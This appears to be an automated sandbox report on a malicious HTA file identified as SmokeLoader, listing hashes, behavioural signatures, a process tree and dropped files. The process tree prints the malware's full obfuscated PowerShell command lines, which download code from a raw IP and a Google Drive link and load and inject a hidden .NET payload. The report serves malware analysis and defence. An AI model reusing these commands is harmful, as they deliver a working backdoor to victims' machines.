Analysis

  • max time kernel
    135s
  • max time network
    141s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-10-2024 02:47

General

  • Target

    7910bb1786288ed1cc204913f0785c32a1bd0b1ee3476d2ef260df564be3b2a5.hta

  • Size

    131KB

  • MD5

    63c86bc9c616e32406ec965054e9d4b0

  • SHA1

    d1a0215e7fa42f4a994228d9cf86ac0a9e3ccebe

  • SHA256

    7910bb1786288ed1cc204913f0785c32a1bd0b1ee3476d2ef260df564be3b2a5

  • SHA512

    15109c6afb31ea10c80b8d3b02eede606d3b2f7f50f55046431b526ec52a9ee0a9ef0328a72dad288e6d11dd5eb2b21f43ecc83a999d03b2886c5926a7606d01

  • SSDEEP

    96:Eam7Xy1+49+cxfj3+dn8HQKozLnm+/07T:Ea2Xy1l9qdQQ7LnmIaT

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Smokeloader family
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\7910bb1786288ed1cc204913f0785c32a1bd0b1ee3476d2ef260df564be3b2a5.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4172
    • C:\Windows\SysWOW64\wIndOWSpOweRsHEll\V1.0\PoWersHeLL.EXe
      "C:\Windows\SyStEm32\wIndOWSpOweRsHEll\V1.0\PoWersHeLL.EXe" "PowErSheLL -Ex BYpass -nop -W 1 -C dEViceCreDeNtialDeplOyMENT ; iEx($(IEx('[SYSTeM.teXt.encODInG]'+[ChaR]0X3A+[CHAr]58+'uTF8.GEtsTrING([SYSTEM.conVErT]'+[ChAr]58+[CHAR]58+'FrOMBASe64strING('+[ChAR]0X22+'JDBubWZjSSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJkRUZpbkl0SW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNYeWUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVxVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWR2WFFpV2gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbEpIZm9adlRlLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUZ0paKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqRmd3b2pjYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWVzUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDSW5jSFhUYndIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDBubWZjSTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni8zOC9naXZpbmdiZXN0dGhpbmdzd2l0aGdvb2RuZXdzZ3JlYXRkYXloYXZlLnRJRiIsIiRlblY6QVBQREFUQVxnaXZpbmdiZXN0dGhpbmdzd2l0aGdvb2RuZXdzZ3JlYXRkYXkudmJTIiwwLDApO3NUQVJULVNsZUVQKDMpO3NUQVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcZ2l2aW5nYmVzdHRoaW5nc3dpdGhnb29kbmV3c2dyZWF0ZGF5LnZiUyI='+[ChAr]0x22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4616
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYpass -nop -W 1 -C dEViceCreDeNtialDeplOyMENT
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1064
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3icuft2e\3icuft2e.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2668
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES977D.tmp" "c:\Users\Admin\AppData\Local\Temp\3icuft2e\CSCC64220172DFA447594548DF1B5CC59F.TMP"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3280
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\givingbestthingswithgoodnewsgreatday.vbS"
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3216
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnQzVKaW1hZ2VVcmwgPSBVSnRodHRwczovL2RyaXZlLicrJ2dvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBVSnQ7QzVKd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtDNScrJ0ppbWFnZUJ5dGVzID0gQzVKd2ViQ2xpZW50LkRvd25sb2FkRGF0YShDNUppbWFnZVVybCcrJyk7QzVKaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoQzVKaW1hZ2VCeXRlcyk7QzUnKydKc3RhcnRGbGFnID0gVUp0PDxCQVNFNjRfU1RBUlQ+PlVKdDtDNUplbmRGbGFnID0gVUp0PDxCQVNFNjRfRU5EPj5VSnQ7QzVKc3RhcnRJbmRleCA9IEM1SmltYWdlVGV4dC5JbmRleE9mJysnKEM1SnN0YXJ0RmxhJysnZyk7QzVKZW5kSW5kZXggPSBDNUppbWFnZVRleHQuSW5kZXhPZihDNUplbmRGbGFnKTtDNUpzdGFydEluZGV4IC1nZSAwIC1hbmQgQzVKZW5kSW5kZXggLWcnKyd0JysnIEM1SnN0YXJ0SW5kZXgnKyc7QzVKc3RhcnRJJysnbmRleCArPSBDNUpzdGFydEZsYWcuTGVuJysnZ3RoO0M1SmJhc2U2NExlbmd0aCA9IEM1SmVuZEluZGV4IC0gQzVKc3RhcnRJbmRleDtDNUpiYXNlNjQnKydDb21tYW5kID0gQzVKaW1hZ2VUZXh0LlN1JysnYnN0cmluZyhDNUpzdGFyJysndEluZGV4LCBDNUpiYXNlNjRMZW5ndGgpO0M1SmJhc2U2NFJldmVyc2VkID0gLWpvaW4gJysnKEM1SmJhc2U2NENvbW1hbmQuVG9DaCcrJ2FyJysnQXJyYXkoKSAwdG8gRm9yRWFjaC1PYmplY3QgeyBDNUpfIH0pWy0xLi4tKEM1SmJhc2U2NCcrJ0NvbW1hbmQuTGVuZ3RoKV07QzVKY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnInKydvbUJhc2U2NFN0cicrJ2luZyhDNUpiYXNlNjRSZXZlcnNlZCk7QzVKbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKEM1SmNvbW1hbmRCeXRlcyk7QzVKdmFpTWV0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZChVSnRWQUlVSnQpO0M1SnZhaU1ldGhvZC5JbnZva2UoQzVKbnVsbCwgQChVSnR0eHQuRkRSUkNMLzgzLzY2MS41MzEuNTQyLjI3MScrJy8vOnB0dGhVJysnSnQsIFVKdGRlc2F0aXZhZG9VSnQsIFVKdGRlc2F0aXZhZG9VSnQsIFVKdGRlc2F0aXZhZG9VSnQsIFVKdGFzcG5ldF9yZWdicm93c2Vyc1VKdCwgVUp0ZGVzYXRpdmFkb1VKdCwgVUp0ZGVzYXRpdmFkb1VKdCxVSnRkZXNhdGl2YWRvVUp0LFVKdGRlc2F0aXZhZG9VSnQsVUp0ZGVzYXRpdmFkbycrJ1VKdCxVSnRkZXNhJysndGl2YWRvVUp0LFVKdGRlc2F0aXZhZG9VSnQsVUp0MVVKdCxVSnRkZXNhdGl2YWRvVUp0KSk7JyktQ3JlcGxhQ2UgICdVSnQnLFtjSEFyXTM5IC1DcmVwbGFDZShbY0hBcl00OCtbY0hBcl0xMTYrW2NIQXJdMTExKSxbY0hBcl0xMjQgLUNyZXBsYUNlICAoW2NIQXJdNjcrW2NIQXJdNTMrW2NIQXJdNzQpLFtjSEFyXTM2KSB8LiggJHNoZWxsSWRbMV0rJHNIRUxMSURbMTNdKydYJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4440
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('C5JimageUrl = UJthttps://drive.'+'google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur UJt;C5JwebClient = New-Object System.Net.WebClient;C5'+'JimageBytes = C5JwebClient.DownloadData(C5JimageUrl'+');C5JimageText = [System.Text.Encoding]::UTF8.GetString(C5JimageBytes);C5'+'JstartFlag = UJt<<BASE64_START>>UJt;C5JendFlag = UJt<<BASE64_END>>UJt;C5JstartIndex = C5JimageText.IndexOf'+'(C5JstartFla'+'g);C5JendIndex = C5JimageText.IndexOf(C5JendFlag);C5JstartIndex -ge 0 -and C5JendIndex -g'+'t'+' C5JstartIndex'+';C5JstartI'+'ndex += C5JstartFlag.Len'+'gth;C5Jbase64Length = C5JendIndex - C5JstartIndex;C5Jbase64'+'Command = C5JimageText.Su'+'bstring(C5Jstar'+'tIndex, C5Jbase64Length);C5Jbase64Reversed = -join '+'(C5Jbase64Command.ToCh'+'ar'+'Array() 0to ForEach-Object { C5J_ })[-1..-(C5Jbase64'+'Command.Length)];C5JcommandBytes = [System.Convert]::Fr'+'omBase64Str'+'ing(C5Jbase64Reversed);C5JloadedAssembly = [System.Reflection.Assembly]::Load(C5JcommandBytes);C5JvaiMethod = [dnlib.IO'+'.Home].GetMethod(UJtVAIUJt);C5JvaiMethod.Invoke(C5Jnull, @(UJttxt.FDRRCL/83/661.531.542.271'+'//:ptthU'+'Jt, UJtdesativadoUJt, UJtdesativadoUJt, UJtdesativadoUJt, UJtaspnet_regbrowsersUJt, UJtdesativadoUJt, UJtdesativadoUJt,UJtdesativadoUJt,UJtdesativadoUJt,UJtdesativado'+'UJt,UJtdesa'+'tivadoUJt,UJtdesativadoUJt,UJt1UJt,UJtdesativadoUJt));')-CreplaCe 'UJt',[cHAr]39 -CreplaCe([cHAr]48+[cHAr]116+[cHAr]111),[cHAr]124 -CreplaCe ([cHAr]67+[cHAr]53+[cHAr]74),[cHAr]36) |.( $shellId[1]+$sHELLID[13]+'X')"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2360
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
              6⤵
              • Checks SCSI registry key(s)
              PID:3648

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PoWersHeLL.EXe.log

    Filesize

    2KB

    MD5

    3d086a433708053f9bf9523e1d87a4e8

    SHA1

    b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

    SHA256

    6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

    SHA512

    931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    12KB

    MD5

    893d6ef9ea93baaa4e0acb427d3148dd

    SHA1

    b89312895086adba18124aef7700fc5997cb457b

    SHA256

    2cc86c87e8f4d230a48bf9cc3422009e30f9d018ae8a10763ef670d31e9008df

    SHA512

    ca03cbf8b1767bb02944e8c83863fa8549c0a30427c8ff16c0e1c5f5ca2b83e3b01f293edc458d51b7a33ff863641cc13807352479af46c438e306c1949256b0

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    e2e7feea1a994dce401ac23a025b4821

    SHA1

    286df50117560ff51c670c03f1d995b8983c5cef

    SHA256

    9f4f482da8b29dfb769df43ab860de41c3d5f41cde7ddb35cc7258cfb224fbf6

    SHA512

    8f69cfd67a2ed3641a691c27465b0579a1baa2b0b95f5d84fbbb6fc084bf17a4c905fb02bf142e4a4c14655a0b839039045fc2b8a645fe3d484aeb9b034a00dd

  • C:\Users\Admin\AppData\Local\Temp\3icuft2e\3icuft2e.dll

    Filesize

    3KB

    MD5

    39cca931808095028697935714be337e

    SHA1

    2865d180316d391161a74fe668fcf871588d8d57

    SHA256

    9b62a6da4405d7e2656ccfe16deb6f3c649992d8d69b6160412f15300573c6ac

    SHA512

    64168323c010a881fe2080bd39e1878899779d0d544bf1fbb90ca16a4dfce219db47d64350b54df6884f40c87a9fed5b1539c0d6bfc206a18b779f967600ec98

  • C:\Users\Admin\AppData\Local\Temp\RES977D.tmp

    Filesize

    1KB

    MD5

    89ccc7d3eb8256d6ad049509618f403f

    SHA1

    3be9906839fdb80a1bf88876e7d1e7a90ea1ea6f

    SHA256

    cab0b4e6a675e310c529627dee72643b68ea1cc00deabdf837611cd766b211d8

    SHA512

    0d9527ef2da60a861c2f812692d42c829028121f30c13506ae422aa7528cace73d489db220926985a89c4349c00f6a80fc243592c5ff12cba70aa2c534373325

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hiwzlaiu.k5u.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\givingbestthingswithgoodnewsgreatday.vbS

    Filesize

    137KB

    MD5

    68b79df67d292d04c897d715cd185b31

    SHA1

    a0b2b93da539502e992931456ccbe5c635457a90

    SHA256

    ef8ab9fdbb2bb1032b5df226da1524dbb1cc691815c62be2a6aecf8d8e5ecfe4

    SHA512

    cc774aac569f7bc0cf09ced183a0d2528a09bb02a8444a12550efc96a67ad2064ac65bdf33bf54267f44137e6a53ad01bf84501fa93f86203c802b975b5d4af8

  • \??\c:\Users\Admin\AppData\Local\Temp\3icuft2e\3icuft2e.0.cs

    Filesize

    468B

    MD5

    7e9a725ff71e17a149e3f37de63e76f8

    SHA1

    f3626671ffc98f98e94b7b8279cf93beb7492ba9

    SHA256

    0a14b5effb9e1d22033fa329ac5f83debb151333841f7246ebb10900596cce3d

    SHA512

    08803896174eabe8e6dce6accbf7f1fe4432ea0a82689b9ff09a1db27d71543ee306ad400d3503280c95d4c7b6838ef0154b1cb4bf0384bccba64a9294d93270

  • \??\c:\Users\Admin\AppData\Local\Temp\3icuft2e\3icuft2e.cmdline

    Filesize

    369B

    MD5

    a878538794b9215cfd78730972fc649f

    SHA1

    30417d4d43f243e6609879f5df886550ff8138c6

    SHA256

    ca38bdf1a6329cd45c0a2358d14aeb68eebb5d9af79357913ab67f1077f262b7

    SHA512

    b7382a35d5acdece87611b636a2f324c691f2a1cb0531f36f76a845c11dfc743d15b8e005c5c8829a227c2cacccbaf4562f3947ec3d72d3c07eee9a1348189c4

  • \??\c:\Users\Admin\AppData\Local\Temp\3icuft2e\CSCC64220172DFA447594548DF1B5CC59F.TMP

    Filesize

    652B

    MD5

    429f0584963ab55034f1117fa441e67e

    SHA1

    e42580c42ac9d2ca368585dc29c99014c59cff5d

    SHA256

    ec8a241958ae374c0fb859c3ac263ed48d39df786305a183ecb330b3a3a307e5

    SHA512

    cfb5a8bed5bbb6022ea01fb51a05342888f6d67dc2f04cdcaaa6ecf7a957be6beec8ac69349b3d71b93804076bbb7f122193915aaecfbb8a724240aa873e6a54

  • memory/1064-29-0x0000000007950000-0x0000000007982000-memory.dmp

    Filesize

    200KB

  • memory/1064-45-0x0000000007D30000-0x0000000007DC6000-memory.dmp

    Filesize

    600KB

  • memory/1064-50-0x0000000007DD0000-0x0000000007DD8000-memory.dmp

    Filesize

    32KB

  • memory/1064-30-0x000000006DD30000-0x000000006DD7C000-memory.dmp

    Filesize

    304KB

  • memory/1064-40-0x0000000006D40000-0x0000000006D5E000-memory.dmp

    Filesize

    120KB

  • memory/1064-41-0x0000000007990000-0x0000000007A33000-memory.dmp

    Filesize

    652KB

  • memory/1064-42-0x0000000008100000-0x000000000877A000-memory.dmp

    Filesize

    6.5MB

  • memory/1064-43-0x0000000007AB0000-0x0000000007ACA000-memory.dmp

    Filesize

    104KB

  • memory/1064-44-0x0000000007B20000-0x0000000007B2A000-memory.dmp

    Filesize

    40KB

  • memory/1064-49-0x0000000007DF0000-0x0000000007E0A000-memory.dmp

    Filesize

    104KB

  • memory/1064-46-0x0000000007CB0000-0x0000000007CC1000-memory.dmp

    Filesize

    68KB

  • memory/1064-47-0x0000000007CE0000-0x0000000007CEE000-memory.dmp

    Filesize

    56KB

  • memory/1064-48-0x0000000007CF0000-0x0000000007D04000-memory.dmp

    Filesize

    80KB

  • memory/2360-102-0x00000000077A0000-0x00000000078FA000-memory.dmp

    Filesize

    1.4MB

  • memory/2360-103-0x0000000007900000-0x000000000799C000-memory.dmp

    Filesize

    624KB

  • memory/3648-104-0x0000000000400000-0x000000000040B000-memory.dmp

    Filesize

    44KB

  • memory/4440-91-0x0000000005B70000-0x0000000005EC4000-memory.dmp

    Filesize

    3.3MB

  • memory/4616-19-0x0000000006470000-0x00000000064BC000-memory.dmp

    Filesize

    304KB

  • memory/4616-0-0x000000007147E000-0x000000007147F000-memory.dmp

    Filesize

    4KB

  • memory/4616-18-0x0000000006440000-0x000000000645E000-memory.dmp

    Filesize

    120KB

  • memory/4616-65-0x00000000069F0000-0x00000000069F8000-memory.dmp

    Filesize

    32KB

  • memory/4616-71-0x000000007147E000-0x000000007147F000-memory.dmp

    Filesize

    4KB

  • memory/4616-72-0x0000000071470000-0x0000000071C20000-memory.dmp

    Filesize

    7.7MB

  • memory/4616-73-0x0000000007800000-0x0000000007822000-memory.dmp

    Filesize

    136KB

  • memory/4616-74-0x0000000008710000-0x0000000008CB4000-memory.dmp

    Filesize

    5.6MB

  • memory/4616-13-0x0000000005D60000-0x00000000060B4000-memory.dmp

    Filesize

    3.3MB

  • memory/4616-7-0x0000000005CF0000-0x0000000005D56000-memory.dmp

    Filesize

    408KB

  • memory/4616-6-0x0000000005C80000-0x0000000005CE6000-memory.dmp

    Filesize

    408KB

  • memory/4616-81-0x0000000071470000-0x0000000071C20000-memory.dmp

    Filesize

    7.7MB

  • memory/4616-5-0x0000000005480000-0x00000000054A2000-memory.dmp

    Filesize

    136KB

  • memory/4616-4-0x0000000071470000-0x0000000071C20000-memory.dmp

    Filesize

    7.7MB

  • memory/4616-2-0x00000000054E0000-0x0000000005B08000-memory.dmp

    Filesize

    6.2MB

  • memory/4616-3-0x0000000071470000-0x0000000071C20000-memory.dmp

    Filesize

    7.7MB

  • memory/4616-1-0x0000000004E70000-0x0000000004EA6000-memory.dmp

    Filesize

    216KB